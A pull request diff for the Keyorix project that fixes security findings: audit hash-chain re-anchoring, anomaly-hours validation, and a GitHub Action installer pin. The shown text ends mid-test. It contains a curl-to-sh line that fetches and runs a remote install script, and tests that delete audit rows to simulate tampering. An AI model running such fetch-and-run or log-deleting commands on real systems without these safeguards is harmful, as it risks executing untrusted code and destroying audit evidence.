### PR TITLE
fix(security): close all 20 critical/high Wave 6 singleton findings

### DIFF
--- a/integrations/github-action/entrypoint.sh
+++ b/integrations/github-action/entrypoint.sh
@@ -152,7 +152,19 @@ install_cli() {
     # SHA (not the mutable `main` branch, and not a movable tag ref) so a
     # future main-branch or tag compromise can't alter the code piped into
     # `sh` here. Bump deliberately when install.sh's logic needs to change.
-    curl --proto '=https' --tlsv1.2 -fsSL https://raw.githubusercontent.com/keyorixhq/keyorix/6dd9e555125500e76b4e2035a867621e416585a3/install.sh | sh # NOSONAR -- bash:S6506 false positive: --proto '=https' --tlsv1.2 enforces HTTPS; commit SHA is pinned not floating
+    #
+    # Pinned to b8f79619d29fa35355f6ed695e04e24929131a94 (#1342): the
+    # previous pin (6dd9e555...) predates that commit, which closed
+    # install.sh's own fail-OPEN checksum-verification gap — a missing
+    # checksums.txt entry for the runner's platform, or neither sha256sum
+    # nor shasum being available, used to only log a warning and install the
+    # binary anyway with zero integrity signal. Staying on the stale pin
+    # meant this default ("latest", unpinned `version` input) install path
+    # kept fetching that vulnerable install.sh regardless of what HEAD's own
+    # copy already fixed. install.sh has not changed since b8f79619, so this
+    # is the current known-good state — see `git log <pin>..HEAD -- install.sh`
+    # before bumping further.
+    curl --proto '=https' --tlsv1.2 -fsSL https://raw.githubusercontent.com/keyorixhq/keyorix/b8f79619d29fa35355f6ed695e04e24929131a94/install.sh | sh # NOSONAR -- bash:S6506 false positive: --proto '=https' --tlsv1.2 enforces HTTPS; commit SHA is pinned not floating
     # install.sh (pinned above) always installs to this same directory.
     KEYORIX_BIN="${install_dir}/keyorix"
   fi

--- a/integrations/github-action/test/entrypoint_test.sh
+++ b/integrations/github-action/test/entrypoint_test.sh
@@ -67,6 +67,22 @@ else
   bad "#176: installer is not pinned to a commit SHA"
 fi
 
+# --- adversarial-review (integrations-github-action.json#0): being pinned to
+# SOME commit SHA (#176 above) isn't enough on its own — the pin must not
+# point at a pre-fix commit. 6dd9e555125500e76b4e2035a867621e416585a3 predates
+# b8f79619 (#1342), which closed install.sh's own fail-OPEN checksum gap (a
+# missing checksums.txt entry for the platform, or no sha256sum/shasum tool,
+# used to log a warning and install anyway). Staying on the stale pin meant
+# this default ("latest") install path kept fetching that vulnerable
+# install.sh regardless of what HEAD's own copy already fixed. Block-list the
+# specific known-vulnerable SHA so a future revert/rebase can't silently
+# reintroduce it.
+if grep -q '6dd9e555125500e76b4e2035a867621e416585a3' "$entrypoint"; then
+  bad "installer is pinned to a pre-#1342 commit with install.sh's fail-open checksum gap"
+else
+  ok "installer is not pinned to the known-vulnerable pre-#1342 commit"
+fi
+
 # --- #179 (item 2, static): the CLI download path must no longer be the
 # fixed, guessable /tmp/keyorix — it must use a fresh, non-predictable
 # mktemp'd directory instead, closing the "guess the path and race a

--- a/internal/core/anomaly.go
+++ b/internal/core/anomaly.go
@@ -178,11 +178,17 @@ const EventAnomalyBusinessHoursConfigured = "anomaly.business_hours_configured" 
 // that timezone. A blank tz keeps UTC, and the band defaults to 22:00–06:00 unless
 // overridden. Because 0 is the config zero value AND a valid hour, both hours being 0
 // is treated as "unset" (a 0–0 band would be empty) — set the timezone alone and the
-// default band is kept. Returns an error for an unparseable timezone OR a degenerate
-// band (startHour == endHour for any other, explicitly-supplied pair) — a start==end
+// default band is kept. Any other call must supply BOTH hours as a valid, differing
+// pair: partial-update callers (e.g. a caller that loads the persisted config and
+// only overlays the field it means to change) can otherwise collide an intentionally
+// changed hour with the OTHER field's untouched value — including the hardcoded
+// default (22/6) when an out-of-range hour is passed for it, since that used to fall
+// back to the default silently instead of erroring. Returns an error for an
+// unparseable timezone, an out-of-range hour, or a degenerate band (the two hours
+// equal, checked on the FINAL merged pair, not just the raw inputs) — a start==end
 // band matches no hour in isOffHours, which would silently disable the rule with no
-// validation error and no audit trail if allowed through. Either error leaves the
-// prior policy unchanged. On success the new band is recorded as an audit event.
+// validation error and no audit trail if allowed through. Any error leaves the prior
+// policy unchanged. On success the new band is recorded as an audit event.
 func (d *AnomalyDetector) SetBusinessHours(ctx context.Context, tz string, startHour, endHour int) error {
 	p := defaultOffHoursPolicy()
 	if tz != "" {
@@ -193,15 +199,21 @@ func (d *AnomalyDetector) SetBusinessHours(ctx context.Context, tz string, start
 		p.loc = loc
 	}
 	if startHour != 0 || endHour != 0 { // both zero = unset → keep the default band
-		if validHour(startHour) && validHour(endHour) && startHour == endHour {
-			return fmt.Errorf("anomaly business_hours: start_hour and end_hour must differ (an equal start/end band is empty and would silently disable the off_hours rule; pass 0,0 to explicitly keep the default band)")
+		if !validHour(startHour) {
+			return fmt.Errorf("anomaly business_hours: start_hour %d out of range [0,23]", startHour)
 		}
-		if validHour(startHour) {
-			p.start = startHour
+		if !validHour(endHour) {
+			return fmt.Errorf("anomaly business_hours: end_hour %d out of range [0,23]", endHour)
 		}
-		if validHour(endHour) {
-			p.end = endHour
-		}
+		p.start = startHour
+		p.end = endHour
+	}
+	// Checked on the final merged band (not the raw inputs) so a start that
+	// intentionally matches the OTHER field's still-in-effect value — whether that
+	// value came from the hardcoded default above or, before the out-of-range check
+	// above existed, from a silently-kept default — is always caught.
+	if p.start == p.end {
+		return fmt.Errorf("anomaly business_hours: start_hour and end_hour must differ (an equal start/end band is empty and would silently disable the off_hours rule; pass 0,0 to explicitly keep the default band)")
 	}
 	d.offHours = p
 	d.auditBusinessHoursConfig(ctx, tz, p)

--- a/internal/core/anomaly_config.go
+++ b/internal/core/anomaly_config.go
@@ -54,9 +54,17 @@ func (c *KeyorixCore) ApplyAnomalyConfig(ctx context.Context, detector *AnomalyD
 	if cfg.QuarantineHours > 0 {
 		detector.SetBaselineQuarantine(time.Duration(cfg.QuarantineHours) * time.Hour)
 	}
-	// Off-hours (only applied when enabled; the detector keeps its own default when disabled)
+	// Off-hours (only applied when enabled; the detector keeps its own default when
+	// disabled). A rejected band (invalid hour, or a degenerate start==end collision —
+	// see SetBusinessHours) must not be silently swallowed: the detector keeps its
+	// prior policy, but the caller needs to know the persisted config didn't take
+	// effect, so this deferred until after the remaining, independent knobs below are
+	// applied rather than aborting the whole config apply.
+	var offHoursErr error
 	if cfg.OffHoursEnabled {
-		_ = detector.SetBusinessHours(ctx, cfg.OffHoursTimezone, cfg.OffHoursStart, cfg.OffHoursEnd)
+		if err := detector.SetBusinessHours(ctx, cfg.OffHoursTimezone, cfg.OffHoursStart, cfg.OffHoursEnd); err != nil {
+			offHoursErr = fmt.Errorf("anomaly business_hours config rejected: %w", err)
+		}
 	}
 	// ML
 	detector.SetMLConfig(MLConfig{
@@ -75,7 +83,7 @@ func (c *KeyorixCore) ApplyAnomalyConfig(ctx context.Context, detector *AnomalyD
 	if cfg.CumulativeRateMax > 0 {
 		detector.SetCumulativeRateMax(cfg.CumulativeRateMax)
 	}
-	return nil
+	return offHoursErr
 }
 
 // GetAnomalyConfig returns the current persisted anomaly detection config (or

--- a/internal/core/anomaly_config_test.go
+++ b/internal/core/anomaly_config_test.go
@@ -138,6 +138,66 @@ func TestApplyAnomalyConfig_ZeroValuesNotApplied(t *testing.T) {
 	assert.Equal(t, originalQuarantine, detector.quarantine)
 }
 
+func TestApplyAnomalyConfig_OffHoursEnabled_AppliesBand(t *testing.T) {
+	// Legitimate case: OffHoursEnabled with a valid, distinct hour pair must be
+	// applied to the live detector and audited, with no error.
+	store := new(MockStorage)
+	c := newAnomalyConfigCore(store)
+	ctx := context.Background()
+
+	cfg := &models.AnomalyConfigRecord{
+		OffHoursEnabled:  true,
+		OffHoursTimezone: "UTC",
+		OffHoursStart:    20,
+		OffHoursEnd:      7,
+	}
+	store.On("GetAnomalyConfig", ctx).Return(cfg, nil)
+	store.On("LogAuditEvent", ctx, mock.Anything).Return(nil)
+
+	detector := NewAnomalyDetector(store)
+	err := c.ApplyAnomalyConfig(ctx, detector)
+	require.NoError(t, err)
+	assert.Equal(t, 20, detector.offHours.start)
+	assert.Equal(t, 7, detector.offHours.end)
+}
+
+// TestApplyAnomalyConfig_PropagatesBusinessHoursError is the wave6/G05 regression:
+// previously ApplyAnomalyConfig discarded SetBusinessHours' error entirely
+// (`_ = detector.SetBusinessHours(...)`), so a rejected/invalid persisted off-hours
+// config — including the accidental-collision case where a partial update leaves one
+// field matching the other's still-in-effect value — surfaced no error anywhere. The
+// detector must keep its prior (safe) policy, but the caller must now be told the
+// persisted config didn't take effect, AND the other independent knobs (ML here)
+// must still be applied rather than the whole config apply aborting.
+func TestApplyAnomalyConfig_PropagatesBusinessHoursError(t *testing.T) {
+	store := new(MockStorage)
+	c := newAnomalyConfigCore(store)
+	ctx := context.Background()
+
+	// OffHoursStart=6 collides with the hardcoded default OffHoursEnd (6) once
+	// OffHoursEnd is out of range and would (pre-fix) have silently fallen back to
+	// that default, producing a degenerate {6,6} band with no error.
+	cfg := &models.AnomalyConfigRecord{
+		OffHoursEnabled:  true,
+		OffHoursTimezone: "UTC",
+		OffHoursStart:    6,
+		OffHoursEnd:      -1,
+		MLEnabled:        true,
+		MLThreshold:      0.75,
+	}
+	store.On("GetAnomalyConfig", ctx).Return(cfg, nil)
+
+	detector := NewAnomalyDetector(store)
+	before := detector.offHours
+
+	err := c.ApplyAnomalyConfig(ctx, detector)
+	require.Error(t, err, "a rejected off-hours config must be surfaced, not swallowed")
+	assert.Equal(t, before, detector.offHours, "the detector must keep its prior policy, not a degenerate band")
+	// Independent knobs still applied despite the off-hours rejection.
+	assert.True(t, detector.ml.Enabled)
+	assert.Equal(t, 0.75, detector.ml.Threshold)
+}
+
 func TestApplyAnomalyConfig_PropagatesGetError(t *testing.T) {
 	store := new(MockStorage)
 	c := newAnomalyConfigCore(store)

--- a/internal/core/anomaly_test.go
+++ b/internal/core/anomaly_test.go
@@ -322,6 +322,58 @@ func TestSetBusinessHours(t *testing.T) {
 	assert.Equal(t, before, d.offHours, "a rejected degenerate band must not mutate the policy")
 }
 
+// TestSetBusinessHours_PartialUpdateCollision covers wave6/G05: a partial-update
+// caller (e.g. one that fetches the persisted config and overlays only the field it
+// means to change) can supply one genuinely valid hour that happens to numerically
+// collide with the OTHER field's still-in-effect value. The pre-fix bug only checked
+// startHour==endHour on the RAW inputs when BOTH independently passed validHour, so
+// an out-of-range value on the untouched field slipped past that check, silently fell
+// back to the hardcoded default (22 start / 6 end), and could collide with the
+// explicitly-supplied field to produce a degenerate, zero-width band with no error.
+func TestSetBusinessHours_PartialUpdateCollision(t *testing.T) {
+	ctx := context.Background()
+
+	// startHour=6 collides with the hardcoded default endHour (6) once endHour is
+	// out of range and silently falls back to that default.
+	t.Run("valid start collides with default end via out-of-range end", func(t *testing.T) {
+		d := NewAnomalyDetector(nil)
+		before := d.offHours
+		err := d.SetBusinessHours(ctx, "", 6, -1)
+		require.Error(t, err, "an out-of-range end_hour must be rejected, not silently defaulted")
+		assert.Equal(t, before, d.offHours, "a rejected config must not mutate the policy")
+	})
+
+	// endHour=22 collides with the hardcoded default startHour (22) once startHour is
+	// out of range and silently falls back to that default.
+	t.Run("valid end collides with default start via out-of-range start", func(t *testing.T) {
+		d := NewAnomalyDetector(nil)
+		before := d.offHours
+		err := d.SetBusinessHours(ctx, "", 99, 22)
+		require.Error(t, err, "an out-of-range start_hour must be rejected, not silently defaulted")
+		assert.Equal(t, before, d.offHours, "a rejected config must not mutate the policy")
+	})
+
+	// The legitimate "explicitly disabled/keep default" state — both hours 0 — must
+	// still work: this is the one deliberate way to request the default band, distinct
+	// from an accidental collision, and must not be broken by the stricter validation.
+	t.Run("both zero still explicitly keeps the default band", func(t *testing.T) {
+		d := NewAnomalyDetector(nil)
+		err := d.SetBusinessHours(ctx, "", 0, 0)
+		require.NoError(t, err)
+		assert.Equal(t, 22, d.offHours.start)
+		assert.Equal(t, 6, d.offHours.end)
+	})
+
+	// A genuinely valid, non-colliding, fully-supplied pair must still be accepted.
+	t.Run("valid distinct pair is accepted", func(t *testing.T) {
+		d := NewAnomalyDetector(nil)
+		err := d.SetBusinessHours(ctx, "", 6, 18)
+		require.NoError(t, err)
+		assert.Equal(t, 6, d.offHours.start)
+		assert.Equal(t, 18, d.offHours.end)
+	})
+}
+
 func TestVolumeSpike(t *testing.T) {
 	now := time.Date(2026, 6, 17, 12, 0, 0, 0, time.UTC)
 	secret := models.SecretNode{ID: 1, Name: "db"}

--- a/internal/core/audit_checkpoint.go
+++ b/internal/core/audit_checkpoint.go
@@ -174,8 +174,14 @@ func (c *KeyorixCore) WriteAuditCheckpoint(ctx context.Context) (*models.AuditCh
 // duration of this call (see WriteAuditCheckpoint).
 func (c *KeyorixCore) writeAuditCheckpointLocked(ctx context.Context) (*models.AuditCheckpoint, error) {
 	// Verify the raw chain (walk only, no checkpoint enforcement) so we never sign
-	// a head over a broken chain.
-	raw, err := c.storage.VerifyAuditChain(ctx)
+	// a head over a broken chain. Seeded from the current retention anchor (if
+	// any and authenticated) so a prior sanctioned purge doesn't permanently
+	// refuse checkpointing — see audit_retention_anchor.go.
+	anchor, err := c.loadAuditRetentionAnchor(ctx)
+	if err != nil {
+		return nil, fmt.Errorf("failed to load audit chain re-anchor: %w", err)
+	}
+	raw, err := c.storage.VerifyAuditChain(ctx, anchor)
 	if err != nil {
 		return nil, fmt.Errorf("failed to verify audit chain: %w", err)
 	}

--- a/internal/core/audit_checkpoint_test.go
+++ b/internal/core/audit_checkpoint_test.go
@@ -235,7 +235,7 @@ func TestAuditCheckpoint_DetectsTailTruncation(t *testing.T) {
 	// only the signed checkpoint catches the drop.
 	require.NoError(t, db.Exec("DELETE FROM audit_events WHERE id >= 4").Error)
 
-	raw, err := c.storage.VerifyAuditChain(ctx)
+	raw, err := c.storage.VerifyAuditChain(ctx, nil)
 	require.NoError(t, err)
 	assert.True(t, raw.Valid, "the bare chain walk cannot catch tail-truncation on its own")
 
@@ -448,7 +448,7 @@ func TestAuditCheckpoint_DetectsRollbackToOlderCheckpoint(t *testing.T) {
 
 	// Sanity: the latest-checkpoint comparison alone is now satisfied — the surviving
 	// checkpoint certifies 5 and exactly 5 self-consistent events remain.
-	raw, err := c.storage.VerifyAuditChain(ctx)
+	raw, err := c.storage.VerifyAuditChain(ctx, nil)
 	require.NoError(t, err)
 	assert.True(t, raw.Valid, "the bare walk passes")
 

--- a/internal/core/audit_log_retention_test.go
+++ b/internal/core/audit_log_retention_test.go
@@ -14,6 +14,7 @@ import (
 	"github.com/stretchr/testify/require"
 	"gorm.io/gorm"
 
+	"github.com/keyorixhq/keyorix/internal/core/storage"
 	"github.com/keyorixhq/keyorix/internal/storage/models"
 	"github.com/keyorixhq/keyorix/internal/storage/store"
 )
@@ -114,7 +115,7 @@ func TestPurgeAuditLogs_StorageErrorPropagated(t *testing.T) {
 	storageErr := errors.New("db offline")
 	// legalHoldGuard → IsLegalHoldActive → storage.GetActiveLegalHold: no active hold.
 	ms.On("GetActiveLegalHold", mock.Anything).Return((*models.LegalHold)(nil), nil)
-	ms.On("DeleteAuditLogsBefore", mock.Anything, mock.Anything).Return(int64(0), storageErr)
+	ms.On("DeleteAuditLogsBefore", mock.Anything, mock.Anything).Return(int64(0), (*storage.AuditChainAnchor)(nil), storageErr)
 	// LogAuditEvent is called for the system purge event — but only on success.
 	// On error the function returns early, so LogAuditEvent is never called.
 

--- a/internal/core/audit_retention.go
+++ b/internal/core/audit_retention.go
@@ -57,9 +57,22 @@ func (c *KeyorixCore) PurgeAuditLogs(ctx context.Context, cfg AuditLogRetentionC
 		if hold != nil {
 			return fmt.Errorf("refusing to purge: a deployment-wide legal hold is active")
 		}
-		n, err = tx.DeleteAuditLogsBefore(ctx, cutoff)
+		var anchor *storage.AuditChainAnchor
+		n, anchor, err = tx.DeleteAuditLogsBefore(ctx, cutoff)
 		if err != nil {
 			return fmt.Errorf("failed to purge audit logs: %w", err)
+		}
+		// The purge reached into the chained (post-ADR-029) region: without a
+		// signed re-anchor recording the new earliest surviving row, the hash
+		// chain can never verify again (its prev_hash now points at a deleted
+		// predecessor) — VerifyAuditChain would report the trail broken forever,
+		// indistinguishable from real tampering. Persist it in the SAME
+		// transaction as the delete so the two can never be observed apart (a
+		// crash between them would otherwise leave a purge with no re-anchor).
+		if anchor != nil {
+			if err := c.persistAuditRetentionAnchor(ctx, tx, anchor.RowID, anchor.PrevHash, anchor.EntryHash); err != nil {
+				return fmt.Errorf("failed to persist audit chain re-anchor: %w", err)
+			}
 		}
 		return nil
 	})
@@ -146,8 +159,17 @@ func (c *KeyorixCore) AuditRetentionCoverage(ctx context.Context) (*AuditRetenti
 // detection of tail-truncation / genesis re-seed that the bare re-walk cannot
 // catch. Backs GET /api/v1/audit/verify — see
 // docs/adr-029-audit-log-tamper-evidence.md.
+//
+// The raw walk is seeded from the current retention anchor (if any and
+// authenticated) rather than always requiring genesis, so a prior sanctioned
+// retention purge (PurgeAuditLogs) does not permanently break verification of
+// the surviving chain — see audit_retention_anchor.go.
 func (c *KeyorixCore) VerifyAuditChain(ctx context.Context) (*storage.AuditChainVerification, error) {
-	v, err := c.storage.VerifyAuditChain(ctx)
+	anchor, err := c.loadAuditRetentionAnchor(ctx)
+	if err != nil {
+		return nil, fmt.Errorf("failed to load audit chain re-anchor: %w", err)
+	}
+	v, err := c.storage.VerifyAuditChain(ctx, anchor)
 	if err != nil {
 		return nil, fmt.Errorf("failed to verify audit chain: %w", err)
 	}

--- a/internal/core/audit_retention_anchor.go
+++ b/internal/core/audit_retention_anchor.go
@@ -1,0 +1,159 @@
+// audit_retention_anchor.go — chain re-anchor for retention-purge compatibility
+// (ADR-029).
+//
+// The audit hash chain (local_audit_chain.go) always starts at auditGenesisHash
+// — the true first-ever row. Once a retention purge (PurgeAuditLogs) hard-
+// deletes the earliest rows, the new earliest surviving row still carries a
+// real prev_hash pointing at its now-deleted predecessor, so a bare re-walk
+// from genesis reports a broken chain forever — indistinguishable from real
+// tampering, and permanently disabling both VerifyAuditChain and
+// WriteAuditCheckpoint (which refuses to sign over a broken chain).
+//
+// A retention anchor closes that gap: it records that a purge was sanctioned by
+// persisting the new earliest surviving row's id/prev_hash/entry_hash, HMAC-
+// signed with the same checkpoint signing key (KEK-derived, held in memory by
+// this process only — the database/DBA does not have it, mirroring
+// audit_checkpoint.go's own signing key). A DB-level actor cannot forge an
+// anchor claiming an arbitrary gap is fine: without the key, any forged value
+// fails signature verification and is ignored, and the walk then requires
+// genesis again — the existing, safe (if inconvenient) failure mode.
+//
+// Persisted as a SINGLE overwritten system_metadata row (like the high-water
+// mark, auditHighWaterKey) — it always reflects the earliest surviving row as
+// of the MOST RECENT purge that reached into the chained (post-ADR-029)
+// region, so an older anchor can never be replayed to claim a LARGER surviving
+// prefix than what a subsequent purge actually left: any mismatch between the
+// anchor's claimed row and the live earliest row is reported as a broken
+// chain (see local_audit_chain.go's VerifyAuditChain), never silently trusted.
+package core
+
+import (
+	"context"
+	"crypto/hmac"
+	"crypto/sha256"
+	"encoding/hex"
+	"fmt"
+	"log"
+	"strconv"
+	"strings"
+
+	"github.com/keyorixhq/keyorix/internal/core/storage"
+)
+
+// auditRetentionAnchorKey is the system_metadata key holding the signed
+// retention re-anchor.
+const auditRetentionAnchorKey = "audit_retention_anchor" // #nosec G101 -- metadata key name, not a credential
+
+// auditRetentionAnchorSep separates fields in the persisted value. Must not be
+// "\x00": PostgreSQL text/varchar columns reject an embedded NUL byte outright
+// (see auditHighWaterSep's doc comment for the same constraint on the
+// high-water mark, which this mirrors).
+const auditRetentionAnchorSep = "\x1f"
+
+// auditRetentionAnchorCanonical is the exact byte string signed/verified for a
+// retention anchor. The "retanchor-v1" prefix domain-separates it from
+// checkpointCanonical and auditHighWaterValue's own layouts — an HMAC valid for
+// one of those must never also verify as a valid retention anchor, or vice
+// versa, even though all three share the same underlying signing key.
+func auditRetentionAnchorCanonical(rowID uint, prevHash, entryHash, keyVersion string) string {
+	return fmt.Sprintf("retanchor-v1\x00%d\x00%s\x00%s\x00%s", rowID, prevHash, entryHash, keyVersion)
+}
+
+// signRetentionAnchorWithVersion computes the HMAC over the anchor fields under
+// the given key_version label (not necessarily the current one — see
+// loadAuditRetentionAnchor, which recomputes under a STORED key_version purely
+// to tell an actual tamper apart from a stale anchor left by a signing-key
+// rotation; either way c.auditCkptKey is the only key bytes this process has).
+func (c *KeyorixCore) signRetentionAnchorWithVersion(rowID uint, prevHash, entryHash, keyVersion string) string {
+	mac := hmac.New(sha256.New, c.auditCkptKey)
+	mac.Write([]byte(auditRetentionAnchorCanonical(rowID, prevHash, entryHash, keyVersion)))
+	return hex.EncodeToString(mac.Sum(nil))
+}
+
+// signRetentionAnchor signs a fresh anchor under the CURRENT signing key/version.
+func (c *KeyorixCore) signRetentionAnchor(rowID uint, prevHash, entryHash string) string {
+	return c.signRetentionAnchorWithVersion(rowID, prevHash, entryHash, c.auditCkptKeyVersion)
+}
+
+// auditRetentionAnchorValue serializes a retention anchor for persistence via
+// SetSystemMetadata.
+func auditRetentionAnchorValue(rowID uint, prevHash, entryHash, keyVersion, sig string) string {
+	return strings.Join([]string{
+		"v1",
+		strconv.FormatUint(uint64(rowID), 10),
+		prevHash,
+		entryHash,
+		keyVersion,
+		sig,
+	}, auditRetentionAnchorSep)
+}
+
+// parseAuditRetentionAnchor parses a stored value back into its fields. ok is
+// false on any malformed value (treated as "no anchor").
+func parseAuditRetentionAnchor(val string) (rowID uint, prevHash, entryHash, keyVersion, sig string, ok bool) {
+	parts := strings.Split(val, auditRetentionAnchorSep)
+	if len(parts) != 6 || parts[0] != "v1" {
+		return 0, "", "", "", "", false
+	}
+	id, err := strconv.ParseUint(parts[1], 10, 32)
+	if err != nil || id == 0 {
+		return 0, "", "", "", "", false
+	}
+	return uint(id), parts[2], parts[3], parts[4], parts[5], true
+}
+
+// persistAuditRetentionAnchor signs and stores a fresh retention anchor for the
+// given new-earliest-surviving row. Called by PurgeAuditLogs INSIDE the same
+// transaction as the delete (via tx, the transaction-scoped storage.Storage)
+// whenever DeleteAuditLogsBefore reports the purge reached into the chained
+// (post-ADR-029) region — see its doc comment. A no-op (logged, not fatal) when
+// no signing key is configured: without a key, no marker could be authenticated
+// anyway (see AuditCheckpointsAvailable), so writing an unsigned one would only
+// create a plain, DB-forgeable marker — worse than no marker at all.
+func (c *KeyorixCore) persistAuditRetentionAnchor(ctx context.Context, tx storage.Storage, rowID uint, prevHash, entryHash string) error {
+	if !c.AuditCheckpointsAvailable() {
+		log.Printf("audit retention: purge reached into the chained region but no checkpoint signing key is configured — the audit chain will not verify past this purge until encryption is enabled and a subsequent purge re-anchors it")
+		return nil
+	}
+	sig := c.signRetentionAnchor(rowID, prevHash, entryHash)
+	val := auditRetentionAnchorValue(rowID, prevHash, entryHash, c.auditCkptKeyVersion, sig)
+	return tx.SetSystemMetadata(ctx, auditRetentionAnchorKey, val)
+}
+
+// loadAuditRetentionAnchor reads and authenticates the current retention
+// anchor, returning nil when none exists, it fails to parse, or its signature
+// does not verify — either genuine tampering, or a stale anchor left by a
+// signing-key rotation (a KEK-provider migration; we hold only the CURRENT key,
+// so an anchor signed under a superseded one can never be re-verified here).
+// Either way it is safest to ignore an unverifiable anchor rather than trust
+// it: the walk then requires genesis and correctly reports the trail broken
+// until a fresh purge re-anchors it under the current key — never silently
+// treats an unauthenticated value as a valid seed point. Only a genuine storage
+// failure reading it is returned as an error.
+func (c *KeyorixCore) loadAuditRetentionAnchor(ctx context.Context) (*storage.AuditChainAnchor, error) {
+	if !c.AuditCheckpointsAvailable() {
+		return nil, nil
+	}
+	val, ok, err := c.storage.GetSystemMetadata(ctx, auditRetentionAnchorKey)
+	if err != nil {
+		return nil, err
+	}
+	if !ok {
+		return nil, nil
+	}
+	rowID, prevHash, entryHash, keyVersion, sig, parsed := parseAuditRetentionAnchor(val)
+	if !parsed {
+		log.Printf("audit retention anchor is malformed — ignoring it")
+		return nil, nil
+	}
+	computed := c.signRetentionAnchorWithVersion(rowID, prevHash, entryHash, keyVersion)
+	if !hmac.Equal([]byte(computed), []byte(sig)) {
+		if keyVersion == c.auditCkptKeyVersion {
+			log.Printf("audit retention anchor fails its signature under the current key version %q — ignoring it (the marker was tampered with; chain verification requires genesis and will report broken until a fresh purge re-anchors it)", keyVersion)
+		} else {
+			log.Printf("audit retention anchor is signed under a superseded key version %q — ignoring it (a KEK-provider migration likely occurred; a fresh retention purge re-anchors it under the current key)", keyVersion)
+		}
+		return nil, nil
+	}
+	return &storage.AuditChainAnchor{RowID: rowID, PrevHash: prevHash, EntryHash: entryHash}, nil
+}

--- a/internal/core/audit_retention_reanchor_test.go
+++ b/internal/core/audit_retention_reanchor_test.go
@@ -1,0 +1,205 @@
+// audit_retention_reanchor_test.go — regression coverage for the retention-purge
+// chain re-anchor fix (ADR-029 / audit_retention_anchor.go).
+//
+// Before the fix, DeleteAuditLogsBefore's hard-delete left the new earliest
+// surviving row's prev_hash pointing at a now-deleted predecessor, so
+// VerifyAuditChain's bare walk (which always started at auditGenesisHash) broke
+// permanently on the very next call — indistinguishable from real tampering,
+// and forever after for the life of the deployment (any subsequent purge only
+// makes it worse, never better). These tests assert the purge → verify sequence
+// now succeeds (TestPurgeAuditLogs_ChainVerifiesAfterPurge), that checkpointing
+// recovers too (TestWriteAuditCheckpoint_SucceedsAfterPurge), and that the fix
+// does not weaken tamper detection: a DB-level actor deleting MORE than the
+// purge authorized (TestPurgeAuditLogs_AttackerDeletesAnchoredRow_StillDetected)
+// or forging an anchor without the signing key
+// (TestVerifyAuditChain_ForgedRetentionAnchorRejected) is still caught.
+package core
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	"github.com/keyorixhq/keyorix/internal/storage/sqlitedialect"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	"gorm.io/gorm"
+
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/keyorixhq/keyorix/internal/storage/store"
+)
+
+// newReanchorTestCore builds a real-SQLite core with a fixed checkpoint signing
+// key and a fixed clock, migrating every table the retention-purge +
+// chain-verify + checkpoint path touches.
+func newReanchorTestCore(t *testing.T) (*KeyorixCore, *gorm.DB, time.Time) {
+	t.Helper()
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(
+		&models.AuditEvent{}, &models.AuditCheckpoint{}, &models.SystemMetadata{}, &models.LegalHold{},
+	))
+	fixed := time.Date(2026, 8, 1, 12, 0, 0, 0, time.UTC)
+	c := NewKeyorixCore(store.NewLocalStorage(db))
+	c.now = func() time.Time { return fixed }
+	c.SetAuditCheckpointKey([]byte("reanchor-test-key-32-bytes-long"), "v1")
+	return c, db, fixed
+}
+
+// logChainedEvent appends one properly hash-chained audit event at the given
+// time, via the real LogAuditEvent path (not a raw INSERT), so it links into
+// the ADR-029 chain exactly like a real event would.
+func logChainedEvent(t *testing.T, c *KeyorixCore, eventType string, at time.Time) *models.AuditEvent {
+	t.Helper()
+	tr := true
+	e := &models.AuditEvent{
+		EventType: eventType, Description: "reanchor test event",
+		Success: &tr, EventTime: at, ActorType: "user",
+	}
+	require.NoError(t, c.storage.LogAuditEvent(context.Background(), e))
+	return e
+}
+
+// TestPurgeAuditLogs_ChainVerifiesAfterPurge is the core regression test: purge
+// the earliest chained events, then verify the SURVIVING chain still succeeds.
+// Against pre-fix code this fails — VerifyAuditChain reports the trail
+// permanently broken at the new earliest row because its prev_hash points at a
+// row the purge just deleted, and the walk unconditionally requires genesis.
+func TestPurgeAuditLogs_ChainVerifiesAfterPurge(t *testing.T) {
+	ctx := context.Background()
+	c, _, fixed := newReanchorTestCore(t)
+
+	// 5 events older than the 30-day retention window (will be purged)...
+	var oldIDs []uint
+	for i := 0; i < 5; i++ {
+		e := logChainedEvent(t, c, "secret.read", fixed.AddDate(0, 0, -(40+i)))
+		oldIDs = append(oldIDs, e.ID)
+	}
+	// ...and 3 recent events that must survive.
+	var survivors []*models.AuditEvent
+	for i := 0; i < 3; i++ {
+		survivors = append(survivors, logChainedEvent(t, c, "secret.updated", fixed.AddDate(0, 0, -(1+i))))
+	}
+	require.Len(t, oldIDs, 5)
+
+	// Sanity: before the purge, the raw store-layer walk from genesis succeeds
+	// (nothing has been deleted yet).
+	pre, err := c.storage.VerifyAuditChain(ctx, nil)
+	require.NoError(t, err)
+	require.True(t, pre.Valid)
+	require.Equal(t, int64(8), pre.ChainedEvents)
+
+	result, err := c.PurgeAuditLogs(ctx, AuditLogRetentionConfig{RetentionDays: 30})
+	require.NoError(t, err)
+	require.Equal(t, int64(5), result.DeletedCount)
+
+	// The critical assertion: core.VerifyAuditChain (which composes the raw walk
+	// with the retention anchor) must STILL SUCCEED on the surviving chain.
+	v, err := c.VerifyAuditChain(ctx)
+	require.NoError(t, err)
+	assert.True(t, v.Valid, "chain must verify after a sanctioned retention purge: %s", v.Reason)
+	assert.Nil(t, v.FirstBrokenID)
+	// 3 surviving user events + 1 system.audit_purge event PurgeAuditLogs itself
+	// appends after the delete commits.
+	assert.Equal(t, int64(4), v.ChainedEvents)
+	assert.Equal(t, int64(0), v.UnchainedEvents)
+
+	_ = survivors
+}
+
+// TestWriteAuditCheckpoint_SucceedsAfterPurge covers the other half of the
+// finding: writeAuditCheckpointLocked calls the same raw chain walk and
+// refuses to sign over a chain it sees as broken. Before the fix, checkpointing
+// was ALSO permanently disabled after the first retention purge.
+func TestWriteAuditCheckpoint_SucceedsAfterPurge(t *testing.T) {
+	ctx := context.Background()
+	c, _, fixed := newReanchorTestCore(t)
+
+	for i := 0; i < 4; i++ {
+		logChainedEvent(t, c, "secret.read", fixed.AddDate(0, 0, -(35+i)))
+	}
+	for i := 0; i < 2; i++ {
+		logChainedEvent(t, c, "secret.read", fixed.AddDate(0, 0, -1))
+	}
+
